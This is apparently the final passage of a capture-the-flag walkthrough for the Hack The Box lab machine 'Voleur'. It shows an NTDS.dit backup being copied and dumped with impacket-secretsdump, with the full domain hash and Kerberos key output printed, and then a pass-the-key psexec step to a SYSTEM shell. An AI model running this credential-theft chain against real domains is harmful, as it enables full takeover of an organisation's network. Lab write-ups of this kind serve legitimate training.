ls: cannot access 'pagefile.sys': Permission denied
'$Recycle.Bin'  '$WinREAgent'  'Documents and Settings'   DumpStack.log.tmp   Finance   HR   IT   PerfLogs  'Program Files'  'Program Files (x86)'   ProgramData   Recovery  'System Volume Information'   Users   Windows   inetpub   pagefile.sys
svc_backup@DC:/mnt/c$

Visting the IT folder, we find a backup of the NTDS.dit and registries (the exact output of an ntdsutil.exe backup).

svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls
'Active Directory'   registry
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ cd Active\\ Directory/
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ ls
ntds.dit  ntds.jfm
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ cd ..
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ cd registry/
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$ ls
SECURITY  SYSTEM
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$

Let’s copy all the files and perform secretsdump

└─$ scp -i id_rsa -P 2222 -r svc_backup@voleur.htb:'/mnt/c/IT/Third-Line Support/Backups/*' ./
ntds.dit                                                                                                                                                                                                                                    100%   24MB   1.2MB/s   00:20    
ntds.jfm                                                                                                                                                                                                                                    100%   16KB  15.8KB/s   00:01    
SECURITY                                                                                                                                                                                                                                    100%   32KB  32.0KB/s   00:01    
SYSTEM                                                                                                                                                                                                                                      100%   18MB   2.5MB/s   00:06

─$ impacket-secretsdump -system registry/SYSTEM -security registry/SECURITY -ntds Active\\ Directory/ntds.dit LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM 
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from Active Directory/ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...

we got the Administrator hash now we can get the shell

└─$ impacket-psexec -k -aesKey f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb 'voleur.htb/Administrator@dc.voleur.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Requesting shares on dc.voleur.htb.....
[*] Found writable share ADMIN$
[*] Uploading file lbuLNvMZ.exe
[*] Opening SVCManager on dc.voleur.htb.....
[*] Creating service XnIq on dc.voleur.htb.....
[*] Starting service XnIq.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.

C:\\Windows\\system32> whoami
nt authority\\system

and we got the root.txt


 Directory of C:\\Users\\Administrator\\Desktop

06/05/2025  03:33 PM    <DIR>          .
06/05/2025  03:30 PM    <DIR>          ..
01/29/2025  02:12 AM             2,308 Microsoft Edge.lnk
07/07/2025  08:47 AM                34 root.txt
               2 File(s)          2,342 bytes
               2 Dir(s)   3,626,782,720 bytes free

PreviousHTB | RustyKey NextHTB | Mirage

Last updated 7 days ago

hashtagNMAP

hashtagPort 53

hashtagSMB

hashtagBloodhound

hashtagFoothold/ Shell

hashtagShell as svc_winrm

hashtagWriteSPN

hashtagCrack the svc_winrm TGS-REP hash

hashtagPrivilege Escalation

hashtagShell as Administrator

hashtagRestoring todd.wolfe

hashtagSMB as todd

hashtagParsing DPAPI from user's home directory to get jeremy.combs

hashtagSMB via jeremy.combs

hashtagSHH as svc_backup

hashtagFinding NTDS.dit backup, parsing it and getting root